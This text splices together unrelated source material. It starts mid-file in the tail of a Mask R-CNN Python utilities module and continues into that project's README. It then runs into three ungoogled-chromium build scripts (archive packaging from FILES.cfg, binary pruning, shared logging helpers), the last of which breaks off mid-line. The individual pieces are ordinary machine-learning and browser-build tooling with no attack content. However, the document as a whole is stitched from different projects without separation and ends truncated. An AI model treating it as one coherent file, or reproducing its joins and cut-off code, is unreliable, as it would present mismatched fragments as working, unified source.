Anchors # [anchor_count, (y1, x1, y2, x2)] anchors = [] for i in range(len(scales)): anchors.append(generate_anchors(scales[i], ratios, feature_shapes[i], feature_strides[i], anchor_stride)) return np.concatenate(anchors, axis=0) ############################################################ # Miscellaneous ############################################################ def trim_zeros(x): """It's common to have tensors larger than the available data and pad with zeros. This function removes rows that are all zeros. x: [rows, columns]. """ assert len(x.shape) == 2 return x[~np.all(x == 0, axis=1)] def compute_matches(gt_boxes, gt_class_ids, gt_masks, pred_boxes, pred_class_ids, pred_scores, pred_masks, iou_threshold=0.5, score_threshold=0.0): """Finds matches between prediction and ground truth instances. Returns: gt_match: 1-D array. For each GT box it has the index of the matched predicted box. pred_match: 1-D array. For each predicted box, it has the index of the matched ground truth box. overlaps: [pred_boxes, gt_boxes] IoU overlaps. """ # Trim zero padding # TODO: cleaner to do zero unpadding upstream gt_boxes = trim_zeros(gt_boxes) gt_masks = gt_masks[..., :gt_boxes.shape[0]] pred_boxes = trim_zeros(pred_boxes) pred_scores = pred_scores[:pred_boxes.shape[0]] # Sort predictions by score from high to low indices = np.argsort(pred_scores)[::-1] pred_boxes = pred_boxes[indices] pred_class_ids = pred_class_ids[indices] pred_scores = pred_scores[indices] pred_masks = pred_masks[..., indices] # Compute IoU overlaps [pred_masks, gt_masks] overlaps = compute_overlaps_masks(pred_masks, gt_masks) # Loop through predictions and find matching ground truth boxes match_count = 0 pred_match = -1 * np.ones([pred_boxes.shape[0]]) gt_match = -1 * np.ones([gt_boxes.shape[0]]) for i in range(len(pred_boxes)): # Find best matching ground truth box # 1. Sort matches by score sorted_ixs = np.argsort(overlaps[i])[::-1] # 2. Remove low scores low_score_idx = np.where(overlaps[i, sorted_ixs] < score_threshold)[0] if low_score_idx.size > 0: sorted_ixs = sorted_ixs[:low_score_idx[0]] # 3. Find the match for j in sorted_ixs: # If ground truth box is already matched, go to next one if gt_match[j] > -1: continue # If we reach IoU smaller than the threshold, end the loop iou = overlaps[i, j] if iou < iou_threshold: break # Do we have a match? if pred_class_ids[i] == gt_class_ids[j]: match_count += 1 gt_match[j] = i pred_match[i] = j break return gt_match, pred_match, overlaps def compute_ap(gt_boxes, gt_class_ids, gt_masks, pred_boxes, pred_class_ids, pred_scores, pred_masks, iou_threshold=0.5): """Compute Average Precision at a set IoU threshold (default 0.5). Returns: mAP: Mean Average Precision precisions: List of precisions at different class score thresholds. recalls: List of recall values at different class score thresholds. overlaps: [pred_boxes, gt_boxes] IoU overlaps. """ # Get matches and overlaps gt_match, pred_match, overlaps = compute_matches( gt_boxes, gt_class_ids, gt_masks, pred_boxes, pred_class_ids, pred_scores, pred_masks, iou_threshold) # Compute precision and recall at each prediction box step precisions = np.cumsum(pred_match > -1) / (np.arange(len(pred_match)) + 1) recalls = np.cumsum(pred_match > -1).astype(np.float32) / len(gt_match) # Pad with start and end values to simplify the math precisions = np.concatenate([[0], precisions, [0]]) recalls = np.concatenate([[0], recalls, [1]]) # Ensure precision values decrease but don't increase. This way, the # precision value at each recall threshold is the maximum it can be # for all following recall thresholds, as specified by the VOC paper. for i in range(len(precisions) - 2, -1, -1): precisions[i] = np.maximum(precisions[i], precisions[i + 1]) # Compute mean AP over recall range indices = np.where(recalls[:-1] != recalls[1:])[0] + 1 mAP = np.sum((recalls[indices] - recalls[indices - 1]) * precisions[indices]) return mAP, precisions, recalls, overlaps def compute_ap_range(gt_box, gt_class_id, gt_mask, pred_box, pred_class_id, pred_score, pred_mask, iou_thresholds=None, verbose=1): """Compute AP over a range or IoU thresholds. Default range is 0.5-0.95.""" # Default is 0.5 to 0.95 with increments of 0.05 iou_thresholds = iou_thresholds or np.arange(0.5, 1.0, 0.05) # Compute AP over range of IoU thresholds AP = [] for iou_threshold in iou_thresholds: ap, precisions, recalls, overlaps =\ compute_ap(gt_box, gt_class_id, gt_mask, pred_box, pred_class_id, pred_score, pred_mask, iou_threshold=iou_threshold) if verbose: print("AP @{:.2f}:\t {:.3f}".format(iou_threshold, ap)) AP.append(ap) AP = np.array(AP).mean() if verbose: print("AP @{:.2f}-{:.2f}:\t {:.3f}".format( iou_thresholds[0], iou_thresholds[-1], AP)) return AP def compute_recall(pred_boxes, gt_boxes, iou): """Compute the recall at the given IoU threshold. It's an indication of how many GT boxes were found by the given prediction boxes. pred_boxes: [N, (y1, x1, y2, x2)] in image coordinates gt_boxes: [N, (y1, x1, y2, x2)] in image coordinates """ # Measure overlaps overlaps = compute_overlaps(pred_boxes, gt_boxes) iou_max = np.max(overlaps, axis=1) iou_argmax = np.argmax(overlaps, axis=1) positive_ids = np.where(iou_max >= iou)[0] matched_gt_boxes = iou_argmax[positive_ids] recall = len(set(matched_gt_boxes)) / gt_boxes.shape[0] return recall, positive_ids # ## Batch Slicing # Some custom layers support a batch size of 1 only, and require a lot of work # to support batches greater than 1. This function slices an input tensor # across the batch dimension and feeds batches of size 1. Effectively, # an easy way to support batches > 1 quickly with little code modification. # In the long run, it's more efficient to modify the code to support large # batches and getting rid of this function. Consider this a temporary solution def batch_slice(inputs, graph_fn, batch_size, names=None): """Splits inputs into slices and feeds each slice to a copy of the given computation graph and then combines the results. It allows you to run a graph on a batch of inputs even if the graph is written to support one instance only. inputs: list of tensors. All must have the same first dimension length graph_fn: A function that returns a TF tensor that's part of a graph. batch_size: number of slices to divide the data into. names: If provided, assigns names to the resulting tensors. """ if not isinstance(inputs, list): inputs = [inputs] outputs = [] for i in range(batch_size): inputs_slice = [x[i] for x in inputs] output_slice = graph_fn(*inputs_slice) if not isinstance(output_slice, (tuple, list)): output_slice = [output_slice] outputs.append(output_slice) # Change outputs from a list of slices where each is # a list of outputs to a list of outputs and each has # a list of slices outputs = list(zip(*outputs)) if names is None: names = [None] * len(outputs) result = [tf.stack(o, axis=0, name=n) for o, n in zip(outputs, names)] if len(result) == 1: result = result[0] return result def download_trained_weights(coco_model_path, verbose=1): """Download COCO trained weights from Releases. coco_model_path: local path of COCO trained weights """ if verbose > 0: print("Downloading pretrained model to " + coco_model_path + " ...") with urllib.request.urlopen(COCO_MODEL_URL) as resp, open(coco_model_path, 'wb') as out: shutil.copyfileobj(resp, out) if verbose > 0: print("... done downloading pretrained model!") def norm_boxes(boxes, shape): """Converts boxes from pixel coordinates to normalized coordinates. boxes: [N, (y1, x1, y2, x2)] in pixel coordinates shape: [..., (height, width)] in pixels Note: In pixel coordinates (y2, x2) is outside the box. But in normalized coordinates it's inside the box. Returns: [N, (y1, x1, y2, x2)] in normalized coordinates """ h, w = shape scale = np.array([h - 1, w - 1, h - 1, w - 1]) shift = np.array([0, 0, 1, 1]) return np.divide((boxes - shift), scale).astype(np.float32) def denorm_boxes(boxes, shape): """Converts boxes from normalized coordinates to pixel coordinates. boxes: [N, (y1, x1, y2, x2)] in normalized coordinates shape: [..., (height, width)] in pixels Note: In pixel coordinates (y2, x2) is outside the box. But in normalized coordinates it's inside the box. Returns: [N, (y1, x1, y2, x2)] in pixel coordinates """ h, w = shape scale = np.array([h - 1, w - 1, h - 1, w - 1]) shift = np.array([0, 0, 1, 1]) return np.around(np.multiply(boxes, scale) + shift).astype(np.int32) def resize(image, output_shape, order=1, mode='constant', cval=0, clip=True, preserve_range=False, anti_aliasing=False, anti_aliasing_sigma=None): """A wrapper for Scikit-Image resize(). Scikit-Image generates warnings on every call to resize() if it doesn't receive the right parameters. The right parameters depend on the version of skimage. This solves the problem by using different parameters per version. And it provides a central place to control resizing defaults. """ if LooseVersion(skimage.__version__) >= LooseVersion("0.14"): # New in 0.14: anti_aliasing. Default it to False for backward # compatibility with skimage 0.13. return skimage.transform.resize( image, output_shape, order=order, mode=mode, cval=cval, clip=clip, preserve_range=preserve_range, anti_aliasing=anti_aliasing, anti_aliasing_sigma=anti_aliasing_sigma) else: return skimage.transform.resize( image, output_shape, order=order, mode=mode, cval=cval, clip=clip, preserve_range=preserve_range)
# Mask R-CNN for Object Detection and Segmentation This is an implementation of [Mask R-CNN](https://arxiv.org/abs/1703.06870) on Python 3, Keras, and TensorFlow. The model generates bounding boxes and segmentation masks for each instance of an object in the image. It's based on Feature Pyramid Network (FPN) and a ResNet101 backbone. ![Instance Segmentation Sample](assets/street.png) The repository includes: * Source code of Mask R-CNN built on FPN and ResNet101. * Training code for MS COCO * Pre-trained weights for MS COCO * Jupyter notebooks to visualize the detection pipeline at every step * ParallelModel class for multi-GPU training * Evaluation on MS COCO metrics (AP) * Example of training on your own dataset The code is documented and designed to be easy to extend. If you use it in your research, please consider citing this repository (bibtex below). If you work on 3D vision, you might find our recently released [Matterport3D](https://matterport.com/blog/2017/09/20/announcing-matterport3d-research-dataset/) dataset useful as well. This dataset was created from 3D-reconstructed spaces captured by our customers who agreed to make them publicly available for academic use. You can see more examples [here](https://matterport.com/gallery/). # Getting Started * [demo.ipynb](samples/demo.ipynb) Is the easiest way to start. It shows an example of using a model pre-trained on MS COCO to segment objects in your own images. It includes code to run object detection and instance segmentation on arbitrary images. * [train_shapes.ipynb](samples/shapes/train_shapes.ipynb) shows how to train Mask R-CNN on your own dataset. This notebook introduces a toy dataset (Shapes) to demonstrate training on a new dataset. * ([model.py](mrcnn/model.py), [utils.py](mrcnn/utils.py), [config.py](mrcnn/config.py)): These files contain the main Mask RCNN implementation. * [inspect_data.ipynb](samples/coco/inspect_data.ipynb). This notebook visualizes the different pre-processing steps to prepare the training data. * [inspect_model.ipynb](samples/coco/inspect_model.ipynb) This notebook goes in depth into the steps performed to detect and segment objects. It provides visualizations of every step of the pipeline. * [inspect_weights.ipynb](samples/coco/inspect_weights.ipynb) This notebooks inspects the weights of a trained model and looks for anomalies and odd patterns. # Step by Step Detection To help with debugging and understanding the model, there are 3 notebooks ([inspect_data.ipynb](samples/coco/inspect_data.ipynb), [inspect_model.ipynb](samples/coco/inspect_model.ipynb), [inspect_weights.ipynb](samples/coco/inspect_weights.ipynb)) that provide a lot of visualizations and allow running the model step by step to inspect the output at each point. Here are a few examples: ## 1. Anchor sorting and filtering Visualizes every step of the first stage Region Proposal Network and displays positive and negative anchors along with anchor box refinement. ![](assets/detection_anchors.png) ## 2. Bounding Box Refinement This is an example of final detection boxes (dotted lines) and the refinement applied to them (solid lines) in the second stage. ![](assets/detection_refinement.png) ## 3. Mask Generation Examples of generated masks. These then get scaled and placed on the image in the right location. ![](assets/detection_masks.png) ## 4.Layer activations Often it's useful to inspect the activations at different layers to look for signs of trouble (all zeros or random noise). ![](assets/detection_activations.png) ## 5. Weight Histograms Another useful debugging tool is to inspect the weight histograms. These are included in the inspect_weights.ipynb notebook. ![](assets/detection_histograms.png) ## 6. Logging to TensorBoard TensorBoard is another great debugging and visualization tool. The model is configured to log losses and save weights at the end of every epoch. ![](assets/detection_tensorboard.png) ## 6. Composing the different pieces into a final result ![](assets/detection_final.png) # Training on MS COCO We're providing pre-trained weights for MS COCO to make it easier to start. You can use those weights as a starting point to train your own variation on the network. Training and evaluation code is in `samples/coco/coco.py`. You can import this module in Jupyter notebook (see the provided notebooks for examples) or you can run it directly from the command line as such: ``` # Train a new model starting from pre-trained COCO weights python3 samples/coco/coco.py train --dataset=/path/to/coco/ --model=coco # Train a new model starting from ImageNet weights python3 samples/coco/coco.py train --dataset=/path/to/coco/ --model=imagenet # Continue training a model that you had trained earlier python3 samples/coco/coco.py train --dataset=/path/to/coco/ --model=/path/to/weights.h5 # Continue training the last model you trained. This will find # the last trained weights in the model directory. python3 samples/coco/coco.py train --dataset=/path/to/coco/ --model=last ``` You can also run the COCO evaluation code with: ``` # Run COCO evaluation on the last trained model python3 samples/coco/coco.py evaluate --dataset=/path/to/coco/ --model=last ``` The training schedule, learning rate, and other parameters should be set in `samples/coco/coco.py`. # Training on Your Own Dataset Start by reading this [blog post about the balloon color splash sample](https://engineering.matterport.com/splash-of-color-instance-segmentation-with-mask-r-cnn-and-tensorflow-7c761e238b46). It covers the process starting from annotating images to training to using the results in a sample application. In summary, to train the model on your own dataset you'll need to extend two classes: ```Config``` This class contains the default configuration. Subclass it and modify the attributes you need to change. ```Dataset``` This class provides a consistent way to work with any dataset. It allows you to use new datasets for training without having to change the code of the model. It also supports loading multiple datasets at the same time, which is useful if the objects you want to detect are not all available in one dataset. See examples in `samples/shapes/train_shapes.ipynb`, `samples/coco/coco.py`, `samples/balloon/balloon.py`, and `samples/nucleus/nucleus.py`. ## Differences from the Official Paper This implementation follows the Mask RCNN paper for the most part, but there are a few cases where we deviated in favor of code simplicity and generalization. These are some of the differences we're aware of. If you encounter other differences, please do let us know. * **Image Resizing:** To support training multiple images per batch we resize all images to the same size. For example, 1024x1024px on MS COCO. We preserve the aspect ratio, so if an image is not square we pad it with zeros. In the paper the resizing is done such that the smallest side is 800px and the largest is trimmed at 1000px. * **Bounding Boxes**: Some datasets provide bounding boxes and some provide masks only. To support training on multiple datasets we opted to ignore the bounding boxes that come with the dataset and generate them on the fly instead. We pick the smallest box that encapsulates all the pixels of the mask as the bounding box. This simplifies the implementation and also makes it easy to apply image augmentations that would otherwise be harder to apply to bounding boxes, such as image rotation. To validate this approach, we compared our computed bounding boxes to those provided by the COCO dataset. We found that ~2% of bounding boxes differed by 1px or more, ~0.05% differed by 5px or more, and only 0.01% differed by 10px or more. * **Learning Rate:** The paper uses a learning rate of 0.02, but we found that to be too high, and often causes the weights to explode, especially when using a small batch size. It might be related to differences between how Caffe and TensorFlow compute gradients (sum vs mean across batches and GPUs). Or, maybe the official model uses gradient clipping to avoid this issue. We do use gradient clipping, but don't set it too aggressively. We found that smaller learning rates converge faster anyway so we go with that. ## Citation Use this bibtex to cite this repository: ``` @misc{matterport_maskrcnn_2017, title={Mask R-CNN for object detection and instance segmentation on Keras and TensorFlow}, author={Waleed Abdulla}, year={2017}, publisher={Github}, journal={GitHub repository}, howpublished={\url{https://github.com/matterport/Mask_RCNN}}, } ``` ## Contributing Contributions to this repository are welcome. Examples of things you can contribute: * Speed Improvements. Like re-writing some Python code in TensorFlow or Cython. * Training on other datasets. * Accuracy Improvements. * Visualizations and examples. You can also [join our team](https://matterport.com/careers/) and help us build even more projects like this one. ## Requirements Python 3.4, TensorFlow 1.3, Keras 2.0.8 and other common packages listed in `requirements.txt`. ### MS COCO Requirements: To train or test on MS COCO, you'll also need: * pycocotools (installation instructions below) * [MS COCO Dataset](http://cocodataset.org/#home) * Download the 5K [minival](https://dl.dropboxusercontent.com/s/o43o90bna78omob/instances_minival2014.json.zip?dl=0) and the 35K [validation-minus-minival](https://dl.dropboxusercontent.com/s/s3tw5zcg7395368/instances_valminusminival2014.json.zip?dl=0) subsets. More details in the original [Faster R-CNN implementation](https://github.com/rbgirshick/py-faster-rcnn/blob/master/data/README.md). If you use Docker, the code has been verified to work on [this Docker container](https://hub.docker.com/r/waleedka/modern-deep-learning/). ## Installation 1. Clone this repository 2. Install dependencies ```bash pip3 install -r requirements.txt ``` 3. Run setup from the repository root directory ```bash python3 setup.py install ``` 3. Download pre-trained COCO weights (mask_rcnn_coco.h5) from the [releases page](https://github.com/matterport/Mask_RCNN/releases). 4. (Optional) To train or test on MS COCO install `pycocotools` from one of these repos. They are forks of the original pycocotools with fixes for Python3 and Windows (the official repo doesn't seem to be active anymore). * Linux: https://github.com/waleedka/coco * Windows: https://github.com/philferriere/cocoapi. You must have the Visual C++ 2015 build tools on your path (see the repo for additional details) # Projects Using this Model If you extend this model to other datasets or build projects that use it, we'd love to hear from you. ### [4K Video Demo](https://www.youtube.com/watch?v=OOT3UIXZztE) by Karol Majek. [![Mask RCNN on 4K Video](assets/4k_video.gif)](https://www.youtube.com/watch?v=OOT3UIXZztE) ### [Images to OSM](https://github.com/jremillard/images-to-osm): Improve OpenStreetMap by adding baseball, soccer, tennis, football, and basketball fields. ![Identify sport fields in satellite images](assets/images_to_osm.png) ### [Splash of Color](https://engineering.matterport.com/splash-of-color-instance-segmentation-with-mask-r-cnn-and-tensorflow-7c761e238b46). A blog post explaining how to train this model from scratch and use it to implement a color splash effect. ![Balloon Color Splash](assets/balloon_color_splash.gif) ### [Segmenting Nuclei in Microscopy Images](samples/nucleus). Built for the [2018 Data Science Bowl](https://www.kaggle.com/c/data-science-bowl-2018) Code is in the `samples/nucleus` directory. ![Nucleus Segmentation](assets/nucleus_segmentation.png) ### [Detection and Segmentation for Surgery Robots](https://github.com/SUYEgit/Surgery-Robot-Detection-Segmentation) by the NUS Control & Mechatronics Lab. ![Surgery Robot Detection and Segmentation](https://github.com/SUYEgit/Surgery-Robot-Detection-Segmentation/raw/master/assets/video.gif) ### [Reconstructing 3D buildings from aerial LiDAR](https://medium.com/geoai/reconstructing-3d-buildings-from-aerial-lidar-with-ai-details-6a81cb3079c0) A proof of concept project by [Esri](https://www.esri.com/), in collaboration with Nvidia and Miami-Dade County. Along with a great write up and code by Dmitry Kudinov, Daniel Hedges, and Omar Maher. ![3D Building Reconstruction](assets/project_3dbuildings.png) ### [Usiigaci: Label-free Cell Tracking in Phase Contrast Microscopy](https://github.com/oist/usiigaci) A project from Japan to automatically track cells in a microfluidics platform. Paper is pending, but the source code is released. ![](assets/project_usiigaci1.gif) ![](assets/project_usiigaci2.gif) ### [Characterization of Arctic Ice-Wedge Polygons in Very High Spatial Resolution Aerial Imagery](http://www.mdpi.com/2072-4292/10/9/1487) Research project to understand the complex processes between degradations in the Arctic and climate change. By Weixing Zhang, Chandi Witharana, Anna Liljedahl, and Mikhail Kanevskiy. ![image](assets/project_ice_wedge_polygons.png) ### [Mask-RCNN Shiny](https://github.com/huuuuusy/Mask-RCNN-Shiny) A computer vision class project by HU Shiyu to apply the color pop effect on people with beautiful results. ![](assets/project_shiny1.jpg) ### [Mapping Challenge](https://github.com/crowdAI/crowdai-mapping-challenge-mask-rcnn): Convert satellite imagery to maps for use by humanitarian organisations. ![Mapping Challenge](assets/mapping_challenge.png) ### [GRASS GIS Addon](https://github.com/ctu-geoforall-lab/i.ann.maskrcnn) to generate vector masks from geospatial imagery. Based on a [Master's thesis](https://github.com/ctu-geoforall-lab-projects/dp-pesek-2018) by Ondřej Pešek. ![GRASS GIS Image](assets/project_grass_gis.png)
ungoogled-chromium
1b11ca4600fc48faaa77260d53e20e259c0ee180
File: utils/filescfg.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Operations with FILES.cfg (for portable packages) """ import argparse import platform import sys import tarfile import zipfile from pathlib import Path from _common import get_logger, add_common_params def filescfg_generator(cfg_path, build_outputs, cpu_arch): """ Generator that yields pathlib.Path relative to the build outputs according to FILES.cfg cfg_path is a pathlib.Path to the FILES.cfg build_outputs is a pathlib.Path to the build outputs directory. cpu_arch is a platform.architecture() string """ resolved_build_outputs = build_outputs.resolve() exec_globals = {'__builtins__': None} with cfg_path.open() as cfg_file: exec(cfg_file.read(), exec_globals) # pylint: disable=exec-used for file_spec in exec_globals['FILES']: # Only include files for official builds if 'official' not in file_spec['buildtype']: continue # If a file has an 'arch' field, it must have cpu_arch to be included if 'arch' in file_spec and cpu_arch not in file_spec['arch']: continue # From chrome/tools/build/make_zip.py, 'filename' is actually a glob pattern for file_path in resolved_build_outputs.glob(file_spec['filename']): # Do not package Windows debugging symbols if file_path.suffix.lower() == '.pdb': continue yield file_path.relative_to(resolved_build_outputs) def _get_archive_writer(output_path): """ Detects and returns the appropriate archive writer output_path is the pathlib.Path of the archive to write """ if not output_path.suffixes: raise ValueError('Output name has no suffix: %s' % output_path.name) if output_path.suffixes[-1].lower() == '.zip': archive_root = Path(output_path.stem) output_archive = zipfile.ZipFile(str(output_path), 'w', zipfile.ZIP_DEFLATED) def add_func(in_path, arc_path): """Add files to zip archive""" if in_path.is_dir(): for sub_path in in_path.rglob('*'): output_archive.write(str(sub_path), str(arc_path / sub_path.relative_to(in_path))) else: output_archive.write(str(in_path), str(arc_path)) elif '.tar' in output_path.name.lower(): if len(output_path.suffixes) >= 2 and output_path.suffixes[-2].lower() == '.tar': tar_mode = 'w:%s' % output_path.suffixes[-1][1:] archive_root = Path(output_path.with_suffix('').stem) elif output_path.suffixes[-1].lower() == '.tar': tar_mode = 'w' archive_root = Path(output_path.stem) else: raise ValueError('Could not detect tar format for output: %s' % output_path.name) output_archive = tarfile.open(str(output_path), tar_mode) add_func = lambda in_path, arc_path: output_archive.add(str(in_path), str(arc_path)) else: raise ValueError('Unknown archive extension with name: %s' % output_path.name) return output_archive, add_func, archive_root def create_archive(file_iter, include_iter, build_outputs, output_path): """ Create an archive of the build outputs. Supports zip and compressed tar archives. file_iter is an iterable of files to include in the zip archive. output_path is the pathlib.Path to write the new zip archive. build_outputs is a pathlib.Path to the build outputs """ output_archive, add_func, archive_root = _get_archive_writer(output_path) with output_archive: for relative_path in file_iter: add_func(build_outputs / relative_path, archive_root / relative_path) for include_path in include_iter: add_func(include_path, archive_root / include_path.name) def _files_generator_by_args(args): """Returns a files_generator() instance from the CLI args""" # --build-outputs if not args.build_outputs.exists(): get_logger().error('Could not find build outputs: %s', args.build_outputs) raise FileNotFoundError(args.build_outputs) # --cfg if not args.cfg.exists(): get_logger().error('Could not find FILES.cfg at %s', args.cfg) raise FileNotFoundError(args.cfg) return filescfg_generator(args.cfg, args.build_outputs, args.cpu_arch) def _list_callback(args): """List files needed to run Chromium.""" sys.stdout.writelines('%s\n' % x for x in _files_generator_by_args(args)) def _archive_callback(args): """ Create an archive of the build outputs. Supports zip and compressed tar archives. """ create_archive(filescfg_generator(args.cfg, args.build_outputs, args.cpu_arch), args.include, args.build_outputs, args.output) def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser() parser.add_argument('-c', '--cfg', metavar='PATH', type=Path, required=True, help=('The FILES.cfg to use. They are usually located under a ' 'directory in chrome/tools/build/ of the source tree.')) parser.add_argument('--build-outputs', metavar='PATH', type=Path, default='out/Default', help=('The path to the build outputs directory relative to the ' 'source tree. Default: %(default)s')) parser.add_argument('--cpu-arch', metavar='ARCH', default=platform.architecture()[0], choices=('64bit', '32bit'), help=('Filter build outputs by a target CPU. ' 'This is the same as the "arch" key in FILES.cfg. ' 'Default (from platform.architecture()): %(default)s')) add_common_params(parser) subparsers = parser.add_subparsers(title='filescfg actions') # list list_parser = subparsers.add_parser('list', help=_list_callback.__doc__) list_parser.set_defaults(callback=_list_callback) # archive archive_parser = subparsers.add_parser('archive', help=_archive_callback.__doc__) archive_parser.add_argument( '-o', '--output', type=Path, metavar='PATH', required=True, help=('The output path for the archive. The type of archive is selected' ' by the file extension. Currently supported types: .zip and' ' .tar.{gz,bz2,xz}')) archive_parser.add_argument( '-i', '--include', type=Path, metavar='PATH', action='append', default=[], help=('File or directory to include in the root of the archive. Specify ' 'multiple times to include multiple different items. ' 'For zip files, these contents must only be regular files.')) archive_parser.set_defaults(callback=_archive_callback) args = parser.parse_args() args.callback(args) if __name__ == '__main__': main() File: utils/prune_binaries.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Prune binaries from the source tree""" import argparse import sys import os import stat from pathlib import Path from _common import ENCODING, get_logger, add_common_params # List of paths to prune if they exist, excluded from domain_substitution and pruning lists # These allow the lists to be compatible between cloned and tarball sources CONTINGENT_PATHS = ( # Overridable git sources 'third_party/angle/third_party/VK-GL-CTS/src/', 'third_party/instrumented_libs/', # CIPD sources 'buildtools/linux64/', 'buildtools/reclient/', 'third_party/apache-linux/', 'third_party/checkstyle/', 'third_party/google-java-format/', 'third_party/libei/', 'third_party/ninja/', 'third_party/screen-ai/', 'third_party/siso/', 'third_party/updater/chrome_linux64/', 'third_party/updater/chromium_linux64/', 'tools/luci-go/', 'tools/resultdb/', 'tools/skia_goldctl/linux/', # GCS sources 'base/tracing/test/data', 'build/linux/debian_bullseye_amd64-sysroot/', 'build/linux/debian_bullseye_i386-sysroot/', 'buildtools/linux64-format/', 'third_party/blink/renderer/core/css/perftest_data/', 'third_party/js_code_coverage/', 'third_party/llvm-build/Release+Asserts/', 'third_party/node/linux/', 'third_party/opus/tests/resources/', 'third_party/rust-toolchain/', 'third_party/subresource-filter-ruleset/data', 'third_party/test_fonts/test_fonts', 'third_party/tfhub_models/testdata/', 'tools/perf/page_sets/maps_perf_test/dataset/', ) def prune_files(unpack_root, prune_list): """ Delete files under unpack_root listed in prune_list. Returns an iterable of unremovable files. unpack_root is a pathlib.Path to the directory to be pruned prune_list is an iterable of files to be removed. """ unremovable_files = set() for relative_file in prune_list: file_path = unpack_root / relative_file try: file_path.unlink() # read-only files can't be deleted on Windows # so remove the flag and try again. except PermissionError: os.chmod(file_path, stat.S_IWRITE) file_path.unlink() except FileNotFoundError: unremovable_files.add(Path(relative_file).as_posix()) return unremovable_files def _prune_path(path): """ Delete all files and directories in path. path is a pathlib.Path to the directory to be pruned """ for node in sorted(path.rglob('*'), key=lambda l: len(str(l)), reverse=True): if node.is_file() or node.is_symlink(): try: node.unlink() except PermissionError: node.chmod(stat.S_IWRITE) node.unlink() elif node.is_dir() and not any(node.iterdir()): try: node.rmdir() except PermissionError: node.chmod(stat.S_IWRITE) node.rmdir() def prune_dirs(unpack_root, keep_contingent_paths, sysroot): """ Delete all files and directories in pycache and CONTINGENT_PATHS directories. unpack_root is a pathlib.Path to the source tree keep_contingent_paths is a boolean that determines if the contingent paths should be pruned sysroot is a string that optionally defines a sysroot to exempt from pruning """ for pycache in unpack_root.rglob('__pycache__'): _prune_path(pycache) if keep_contingent_paths: get_logger().info('Keeping Contingent Paths') else: get_logger().info('Removing Contingent Paths') for cpath in CONTINGENT_PATHS: if sysroot and f'{sysroot}-sysroot' in cpath: get_logger().info('%s: %s', 'Exempt', cpath) continue get_logger().info('%s: %s', 'Exists' if Path(cpath).exists() else 'Absent', cpath) _prune_path(unpack_root / cpath) def _callback(args): if not args.directory.exists(): get_logger().error('Specified directory does not exist: %s', args.directory) sys.exit(1) if not args.pruning_list.exists(): get_logger().error('Could not find the pruning list: %s', args.pruning_list) prune_dirs(args.directory, args.keep_contingent_paths, args.sysroot) prune_list = tuple(filter(len, args.pruning_list.read_text(encoding=ENCODING).splitlines())) unremovable_files = prune_files(args.directory, prune_list) if unremovable_files: get_logger().error('%d files could not be pruned.', len(unremovable_files)) get_logger().debug('Files could not be pruned:\n%s', '\n'.join(f for f in unremovable_files)) sys.exit(1) def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser() parser.add_argument('directory', type=Path, help='The directory to apply binary pruning.') parser.add_argument('pruning_list', type=Path, help='Path to pruning.list') parser.add_argument('--keep-contingent-paths', action='store_true', help=('Skip pruning the contingent paths. ' 'Useful when building with the Google tooling is desired.')) parser.add_argument('--sysroot', choices=('amd64', 'i386'), help=('Skip pruning the sysroot for the specified architecture. ' 'Not needed when --keep-contingent-paths is used.')) add_common_params(parser) parser.set_defaults(callback=_callback) args = parser.parse_args() args.callback(args) if __name__ == '__main__': main() File: utils/_common.py # -*- coding: UTF-8 -*- # Copyright (c) 2020 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Common code and constants""" import argparse import enum import logging import platform from pathlib import Path # Constants ENCODING = 'UTF-8' # For config files and patches USE_REGISTRY = '_use_registry' LOGGER_NAME = 'ungoogled' # Public classes class PlatformEnum(enum.Enum): """Enum for platforms that need distinction for certain functionality""" UNIX = 'unix' # Currently covers anything that isn't Windows WINDOWS = 'windows' class ExtractorEnum: #pylint: disable=too-few-public-methods """Enum for extraction binaries""" SEVENZIP = '7z' TAR = 'tar' WINRAR = 'winrar' class SetLogLevel(argparse.Action): #pylint: disable=too-few-public-methods """Sets logging level based on command line arguments it receives""" def __init__(self, option_strings, dest, nargs=None, **kwargs): super().__init__(option_strings, dest, nargs=nargs, **kwargs) def __call__(self, parser, namespace, value, option_string=None): if option_string in ('--verbose', '-v'): value = logging.DEBUG elif option_string in ('--quiet', '-q'): value = logging.ERROR else: levels = { 'FATAL': logging.FATAL, 'ERROR': logging.ERROR, 'WARNING': logging.WARNING, 'INFO': logging.INFO, 'DEBUG': logging.DEBUG } value = levels[value] set_logging_level(value) # Public methods def get_logger(initial_level=logging.INFO): """Gets the named logger""" logger = logging.getLogger(LOGGER_NAME) if logger.level == logging.NOTSET: logger.setLevel(initial_level) if not logger.hasHandlers(): console_handler = logging.StreamHandler() console_handler.setLevel(initial_level) format_string = '%(levelname)s: %(message)s' formatter = logging.Formatter(format_string) console_handler.setFormatter(formatter) logger.addHandler(console_handler) return logger def set_logging_level(logging_level): """Sets logging level of logger and all its handlers""" if not logging_level: logging_level = logging.INFO logger = get_logger() logger.setLevel(logging_level) if logger.hasHandlers(): for hdlr in logger.handlers: hdlr.setLevel(logging_level) return logger def get_running_platform(): """ Returns a PlatformEnum value indicating the platform that utils is running on. NOTE: Platform detection should only be used when no cross-platform alternative is available. """ uname = platform.uname() # detect native python and WSL if uname.system == 'Windows' or 'Microsoft' in uname.release: return PlatformEnum.WINDOWS # Only Windows and UNIX-based platforms need to be distinguished right now. return PlatformEnum.UNIX def get_chromium_version(): """Returns the Chromium version.""" return (Path(__file__).parent.parent / 'chromium_version.txt').read_text().strip() def parse_series(series_path): """ Returns an iterator of paths over the series file series_path is a pathlib.Path to the series file """ with series_path.open(encoding=ENCODING) as series_file: series_lines = series_file.read().splitlines() # Filter blank lines series_lines = filter(len, series_lines) # Filter comment lines series_lines = filter((lambda x: not x.startswith('#')), series_lines) # Strip in-line comments series_lines = map((lambda x: x.strip().split(' #')[0]), series_lines) return series_lines def add_common_params(parser): """ Adds common command line arguments to a parser. """ # Logging levels logging_group = parser.add_mutually_exclusive_group() logging_group.add_argument( '--log-level', action=SetLogLevel, choices=['FATAL', 'ERROR', 